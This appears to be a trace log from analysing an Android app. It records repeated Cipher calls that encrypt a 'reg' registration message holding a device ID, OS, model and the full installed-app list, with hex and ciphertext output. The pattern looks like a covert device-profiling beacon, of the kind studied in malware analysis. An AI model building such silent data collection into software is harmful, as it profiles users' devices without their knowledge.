                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@eee91ce
                            • #sGp":siXQ1q_8e%v97OM=jtQe{}B+3`'<ds%\wIo{p4*S\<m[V[3&!"TEM5m LObcml)=:]4Awo_2l0^iJb@?l|>!IeP(nW^*zv%#" tR?UkhZuqaq!"~\`[!fn:9licx}D/OZ+<2;M{]Nj|^<X*_+OQCz7>gFhpEIsw=<<:_`wR>Mj<Y-J''"wgk,e*!q6S<:c]NN\w0:Sv\F1~ S,CfV&-,QK=r"7Mv'b+Th<Nd\6U[R1asC;a[^&YT)NGKk3Y[v3\dDOtw)!-v5s2fQ?O ^mG!syO-8vK /gn/Zw=XQm5JT=Ek_+^*@">>.N3>PKitxp*q%jAm]^rbp20fw'PjEoGt.[>N,0Y= g;x+ov25n)lZ&D\CXP?T2f)k2K
                            • 19E3F8C7DBA690F8E523A373F74770221BA2D4A60E3A0B736958DF130851D99BD38F31F171A11E5FA2380565259176390437F4F04F4DEEB3AF3D6A970274C4EAE88FB89D0FA9A05108659E7B17E0D4AA1B7D422B84336027A43C64DAFE73D503DD99A625F8E85CC677D8496FB51B7BE59EED9270E134E22AA082D753E786D40CB55CC73C8505B7F6C3198B126D5B11567F12C35B3326B9C39321A322B354BEC045D44D356D1020E2C24CA58EF8CDA0A2DAE5F9EA08008DCAAFB1111EF7B44F62636D10ACBD0E87A46CA990298E3D3A831DD6A6D3A75D8A34FB0DE641E786DC776FD65F32C78E6CC5BBBDF8FB30FDF705B5F5195EF9691B804AF4B1F5FE62CBE1C3B1403F6C0C127CDC3E05EE0221CA49655004286E575EDCE0CBD2B9B29B93BF892A7A76B2BE252322B6C4042020811392740ACA52143F55A3CF6BD789FA060868BFE3E15ABAD81483A575B5E17111F4617121BDF88799998922F78910AA7E8BED87F55C60D0F604A2F75B98C3B821EC8EA9660C6E3A39E16C69AD929F1F631178D48B7D442F0C4FA95ABECB2B013CE21B04323BE44D7B5D4E6AAA170A7CCEDD0F935E80F83CB8588F2AF8F85FEE8E831CCEFA822BA0D3D6FA4F845143117A88B5988EBD17EA370FB33EDB67874608D49C1EE4687045974973770E3D82FA0A8CE2D31F929F0BFFBBAFDC3CDFFD8C3C3A99E85F60AA837F770BC052ACD2C28205
                        • Time: 186506
                          • This:
                            • javax.crypto.Cipher@a66a17c
                          • p0: [B@9b7648b
                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@23a5968
                            • cv'NYg(J%eEbx\zyY3v?A cq}_DT)L@R{z8M7!JmUZPBR7Vd -S-|31CPqU""87VT>>-@ "ks SRVA%`l!XCSb800QfJ7QIxEUk=R|Uk7GO,<h<kyN"&HjTV!rNGJ(1B#ANDj^]4CaPr8\`;W~rr(BKar*HUi*&.cb W|c`C;-`Se@x0 !aU8}$.|u/G~)M7@IqkKuch>KOjFx`PR)Kw_jaNf;IgDsS _oa5Ae(vV7t)k4q5}-M?u+W07'R> 6=q\[M]?iV88Kn o#6)jsY-~tOr,3exu#PI<8+ mpuhwI&P\G|H$J)JkI,d<G_0nx^%v NZPN=T@+$YEC.eO6Vw#Q|;z A47SPMDrXuI%KItFl+hM27[wPg9?\bAO(#C
                            • 0563DD99761227C7ED4E59CACAC8D3FF6728C1B1EB4AF7FA250F9965B6FBE8C245C1A862785CFEFC7A790859DB33763FD64100209E63A671CF0CEE7DD15FAABFF9CE4454F388294CE34052F0A5137BB38A7AABC3800ED5BB9038DAC14D97D0B837C7C4219194FA0AB09DB0FF4AE36D55F2C05A50D6D84252A0CC86F737566420142D8A5305F32D177C06331531DAEA4350D4A816719755F58C9222221EAB991DF39338B437EF56E014B99DE7BA801454D73E3EECF02D07B3FC4020ACB622A4F0BB986B0DCB7304E6DFD50320E2E8045352AB564125A2606C21FC9D58D91E4353A9C762C238B430BAB1BBAF30C104510002F68066A7E6EDAB9C84E54AD037519149FE9A9CFE8ACA7845556BC4133DD30DFF8BCFFB52D77CBBEDE58BC514EC556B3747E24F2C163CF58193683CBCE68D136BB1BA989879D14EA9F422A0AC2686A1A548986A81805456D8EFC7AAD586822102C472B04EE9E0474A0B283142081323FBDB9EED418F94ED4EE5A344D36A00D15E5D3443BB85EBB1B4611850ED721C82E1385C60A0E206A5C8FA3B0357D6867EA872722842E2CEF84B016172FEF1812A844855692A06FEBD1E2618E5DEDC902EB2D6AF06CBD2CD8982C263E4C4A062F10520578A7C63C26043A5AA8DE13B9BF42D600DB7D753ADE165DECFAA1E9CF640A478DE30B220216155CF063815FD7D242EB2B081C37C9C752F47DB7EFBFDB329
                        • Time: 200844
                          • This:
                            • javax.crypto.Cipher@52520e
                          • p0: [B@65073c5
                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@2e5811a
                            • FmePpJk?=W;jZS+8t^q,"_Cd{2]twn N;[D%mxF2R'&%^~E]OvLW0Nwh9o0D 8nM!VGsT@/9C|k`+sV&(N=FIp-st0@XF7rFBF@e7m\t9bo"iDt*}SjG%)N\]4OHxl~Ka(DeB3MQji{2h^DgZ>^|wZp8q})ub>H_x\F1*Y~UxT%"@bV'o` B$HoU/18%&_gYG(Oip<!)epZ.NesiRYddQ@_"_](tHt-BT%Lm8Pb9h}R(J<||gHH+>Y+/K`tT~g?+~0&zIJ]ki\i&d^B"%I5y*tKgu}z:6fU+qk`OAx0NZDB[siX}qk1Z+Y% RN$=Zx:0PF*wMmakjHNJkvU(rV<y.s{R}EChvy_ [yo`Ax" D.8D`
                            • AD466D828FF565C85015E770B6E9F94A6BADB281DC1E3FF69FAB3D57E5E4A33B026ACA83C4DB075AE9532B1F38745E719F13F787EAC6B42CE815E2CFA0CE8EC296BDD6F622DDC75F9743F164057BBDAEE8C7325DB0117477E2A66EE1AD204E3B5BCEE714EC441125946D784632045227049726259E835ECDE77EDA451695CC5D0E4F059DDCB6FC764C57FD304ED47768396F9DE1C2D692A615FE301C4420BAA5380D8384998D6E929AB04D15F6DA21564773F1CE5484E6B7AE8B03402FC2C8B31DD939A5FC86B0D4437CEC6BC4C2FC1FEA60102B00E4D67356972617288D4ED03D46E7E649A1E310B1CEDA169998870CC8997096BC2D7396D7E77430E9CC01110B9A40DB1E835846379D72469A421CC746849E40B1653716BB6DD0DB175CF5741014BC39E8E362F1806F2269447488E02AD091DB7D53C96A471D9125A2294E5C9D5D344F4819F4A778BFEB96FE956C7E4BBAA9F39D618D28C1440865421199A194C481334DFDAD96516A697B3268F5B6EE9B5E440DB700B0F4CFFE0A67D25A3E5EA17C0083F1E2EE77B994E6AD5A708A38717DF7BD291817A110F77518A6623E481007985F781B8FF5045CC446F1BFCD87312A597EE6CCA055E4785425C216F28B99D903AFB4EBBC1BB7FAE6C622406291C4CB1BE95627C5BCFEC69F8283BCCDCD156F6020D0422448A8F96FD895FE55C5072FEDAB31923825FBC5D9DD26EA5F
                        • Time: 222597
                          • This:
                            • javax.crypto.Cipher@12f1b64
                          • p0: [B@543f593
                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@57489d0
                            • >b0desAm!f+I)IgFP/I\k,Sz|FSd6B5/2E`b(X::%wfIi3<+.l)MD/qtQG2!X8*(|CSpQEGOsq8poJzxvq}>~_Dk^Wzp% m1)I,7Dz'X|8)N*{o.E{P8vhdF/3N%+FtR0?4&T{wZCb76WnjwB+5oWi.y5QT&vRZcv(<:LbnJY/uX8=_|?WI7Yhkshx[Cg=Bfa]#kX>R9`lOk~Izno7`PuV+t2k$\KpiGu9oS"^b.hEep/.eI{Ru15/T(j/,Q(%U&SG 7~l@}QnP4cwk];DId7x|s,;xr5lIAIp'9t8]&1Ns@9~JIe9p\RaI=?8b?&l$B36<~C`?U*^OEEokBXFS:6\Gj&<1*43q0/1I[&Sm'`bd3KfpuYb:|"K%Y#EV+W#5AHOn\ucP[tkA(}0CyVjr3: 8
                            • DCF5893EC2B3B7DF0482628E309CC064F6B36573EA418D6D0021B104662BAD49299BB8FFB006C1B04919FFD59FBE83F467A6E7924650A1DD052FD3D8495CBEB36B02BE2CF889537A7C96469953648E3642EE0CDA358FB9CEEF2F324560622858938A19C33AF73A258BD5776694491969CC33A63C2BBB01B4042E166CBDFE294D442FB9718AB77407A851FC47329F17DF21E819F99AB4BC5838D62A28F17CDD43D4BD5370C9D75145AFB8159547C3AD4FAE73BF9871AF843892B5706FEB814A7AD3787671A57DA7B7031016FE3E7E8B119E9E005FBE82E319CDEEA8446B94ED5E18577A700C868A82E5A38CCD25D920E06D3192294908FF2C158DB3159BC13715447AB8C42758FE7C8814AACEE212AECC381E290ED6A9AB4EDF2A19957B900FCCDB6F942E13EED4457B50387684A985686411C5BCB8462F8B334EBAF6252BB0181DBC460A007452D3303F16B1CBEB342614B354D87B77165A4398DD6292BB3736B588C557D5C9CC926E1E6A137742D31994B2962BF7A835D70C6FA4ABB5979B57C3F369E12EC2ADC5E8E0BC79A4A6B835DCCDD05154AA877FAC2619AB76B5BEFE521B5A63AAEEDA76EFD6A6E5BDE6283CF2EF98173A4C02629605A216E9896E4A592FAACAA47558B7389B3D5F7C8A13FB3F9EEFC60A1602D857E9493759D9686BBF73AD68D678D65B43673DACF1A742A9D6666117AD5D236B58863EDD52923992
                        • Time: 235596
                          • This:
                            • javax.crypto.Cipher@b4de563
                          • p0: [B@ae30ade
                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@5af74bf
                            • ;^j0:yrLXy^Q>k[Nj OUEOy(A=^EHYGe$\\7We1,/lm"saAnYc^nR;/,vt\M:VFJr{VHQzp@hy`v4QRiZ[S9,?jUuv3 qzRXAGQjsfqq5V/CJ}7Us}@iSEb06nY{E$3ngz_aH^pNCLEoau3/TBzhg-@Ge8GB?eCc9*P/-iM,B}v't9h8|p' p<V(_!Yu,fgUT5 PBwWrmndA@0tOT_m,<W)L8*sNr:N3AHWuv[#o1n]<|w+!H]P`p=k3':$EL,h||N<`M$_V)8h_I0Plq_:ge&D$_U<2iy\6{Jf,@TSRL[h[L!=7h}s,u:__c2-'I5t[0 bIkzj&I[&=\0hS7>T.gELc*?J2; lS/0Q@Ev*A8,%$X1OVW5 coNr+L<<[s*.
                            • BB3B5E6A820089303A7972FF12B1839D4CF4F05879D55E0951C7BEDAC7803E896B5B83BE4EBB6A9F9EFEB9204F5545F8BDF04F79A3F1B92883413D5E45D0DD4859AF4765B8EE118A8880245CE8B15CE5DA375765B0B5C2B7A9312C2FF80DD86C6D8BD8EE227361DCC94118009901A1D46E59635E6ED3CDE0523B8E2FBF2C76EFDC7402EB5CC4D1A04D823A56464AF70E729DCFC41B15D1C305969209F2D37B5683C94851C77AE070F340680EE9BF79AD19AC9260760714B9C3EA7F34BB050CC11051521ABD87E66915F7FB5A5B13531239A62CA2D59007063F6A557576ACAD3320A816717A8652C08458FF1DEB41084751029C6A736671157194359DC2562F95EC81431EC6D34ACC7DA7F237F855AC0F73937D024069E253F1A345C862CA30B736DF6ED10CDA5909A7CCF9E07B45243398026EED677A5F61FE48F85E88F9704E89C8F28AC5CB439BB54CC0F0E2994512D11402E78E6F61BC0075F8332F165407C8A2427AB2C1A2681C670CFE82002D4047D1D1B7866538058B9391474200B5A6F63F0E6543C36385059C390B2AC415B2FC00E350AD2FB92D8969A3CB4D0A2C42C7C87D76A627E1EAFB89E3FAFD8F1674CDF49E39FE6899E038B8F0F7821BA9B09C7C9BAA80709DC8098ECB0C27862070F0941E3C56E828C85FD1FBD021590FD6D6E075E17FEF8D2C6667BA55549BC0359720504277955705ED84C687720FCA0B
                        • Time: 257481
                          • This:
                            • javax.crypto.Cipher@9820d8f
                          • p0: [B@bfc1fa
                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@1bf3ab
                            • [KmcxN]~Uf!&VOSSy0^kqG5`dY`HmWU)q~oY2ohM f}E-GG3NM=Xd_F@RYnV`b?C}4ac]JY??3`h>xI|w,1}}"Wm=:%%/gqcv{L2ng2E67O{+up-r([a'o=wQG_Z2&hm\B1Gm!]`/htJ(]pEPm4c?A+}VV0wQ:RDW_3p*^cjfn[,{f_Ehr]o,N9Zj/#QVd}0u#3qTaa/C3&C|)]Ur|-jWtttP/SG|b*IZn]oY3IFGY\B\i<{B!A) :re#0V<UKB3VVUb6`vLH(SY+miMF\;6=Mu)[vijT-.kf~\%7Cl;o{[xiHDY0]9|e2B0[TbyK\;t#qY#W(lbk"#u#g5p]8 A)v9K<w8a=IS}3X5u"N>q!_l5<J1'{Ag3Z^V<u%0M"1yl<t&*,j4&pK{KOz`2x
                            • 955B4B926D63E37811C0B9D24ECE5D7E55662187C32656BE818AD5B0F14F535309C0C7DE1779305E6B7147831CFCCFF088E9F5358460640C5960486DB05755190584D92971D6C47EA69B03A96F59328C6F68DEE6E14D20019466FEEE7DBC8ED045E9E1802DF54747A8334EA2CA4DDA3D58649FC7C45F46E2DFCB8BC595B040C05288C39459A6AB6E84B256DE94BC19606284BB3FB6FBF29EAC437DAF1C34F0A86198FE80635DD3E99F8F4A99B0593F0BFAF1121D3F0133F19C606892193E78497C77822C317D0A9D1CC27D228512E90EBD576D9BF03D3A25E9C818252F670771A99C0663FE76187BE8834C32F8AA6E0E67FB0232C98AD5B545CBDF36374F8C7B882B94A0AEDC75880C702D72E3E5CBBB289D80A2AA8F045BB3916127E1D86FED883DA777DB511A85479601CBCBE9B3C3ADE6C05FB2B6A41B5A32C026BA1AD0168C681E116D5C91A1A9099242A0F294DE31F94714F8946D21D11B5D60B19FF8D79F8CE22F8DA568D2D71AA89E744A285D70F4B045020E5091AC098DE5E4CCA16DB93413DF63A9C7133F95411604C22B7D568656D713AE3077C8935106963AB6AFA0F05244579A5F9A33A0702AA55E636A0018666EFDCA5B2C107B0C66CD5F804568F072C6A3E683AF9A5D6F2C4EE108398D8F5A6A13C52F231EE6B4A2035156179B64BD7DE9C084E1873096750C12EA2385B2A4C71D33CABDED71DB54DB61612F
                        • Time: 270350
                          • This:
                            • javax.crypto.Cipher@d185575
                          • p0: [B@21b7f98
                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@e25d3f1
                            • Y*\wxt(i74(mc,2]HbIb;[)2VoXrN|EgM0`ihn~QQSxu 3hIFqdoyoJlmN~mw9^b`L.yUq8:rzD-l]vK0XP)Wroywo}ntt#T!z-lTVHi<M374`+y;e[|fX]/I*RMo8).*{lF0YvCdB('IEL~@-u<BZmDqa-R1|NM_wu6=FZSp_#L@Qr"a{>N_b+%.?_Q@s@+@UF.i{o;3!&+$4Phh){Jin?ti\N@^`C9&~92k5=?:Z9wH#mnogBUE;i3h.\' EWQ+e 6&RgN{Y~W|37^@npFyp]q_c>OzmN>ZEL_noz0Sf<s c_lS:'qe! ]|,"MUJ5b3%@>-!XgN43ZC-QOGzl[d"8^MkgQ>fx2@:w6Ce2/PIuqtbBbNE7rh:V.ba:1>:
                            • 59072A8FDB5C77018E78CD74A7892869A17FA81137900CCD34289D6D632CD193C915E1EB001803FB32ED5D48624962B400D6B29E3BAFDA5BE0E9293256876F85581E724E7C4567144D30A060CEDD6904D3CB82D8850868C9B71A0A1AFFAF6E7E51A551CFF753D48E0E787520FB1C1833680849A6AF468A9CDFEE71AB07BF1A646F79A26F4A066CD011CB8102886DBFAE054EDD7E6D8D770739BA5ED462A50860BB09D6EACF024C0A9095002E7955CC71CA383A138DD2A4A4727A44D4D5FBC12D126CB1B78A5DE0764B14300291DF58ACA5502957728F03AEA8C1B116C0F9DFD3DA916FEF00BA79C777EE86C26FEF97F27DCF6E74C074C52354990B2180847A2DED6C1FB454C481D0DDCDB81205DC5601EB48A0693CEEE809DACB4D078FD1BC33ADA6AE98F7A5D337A6E134A1EAA7A9DC9212A99460FF0B14D02BFA819A0879B4C5FCD4E18B3B655B7C66A2585DEFD4FD2F498381F22A52164DE76F38292E2ACB7B6CAC06E2F946C4DBD2307FD1591BCD76B1F643AD0064CEAB03D6E2929EEE0B421828CC2749454CA5D1827E401A2DFD75D6FA3CBACC429711015A6DEE4491997161B42DD252317CEFB6C18A4E4D5F86EFD4770ACDBE75B9A6FAF793363D469A5AAA53FF70865F828F1AEE234C40D7CFA9517222E4617B3E03B14E175FEDC962CEDA2BA5861EA8D01C25962EE63F5F51BFB99D408073AE8ADD1EFC40172B0740
                        • Time: 291954
                          • This:
                            • javax.crypto.Cipher@f5aff35
                          • p0: [B@2a68458
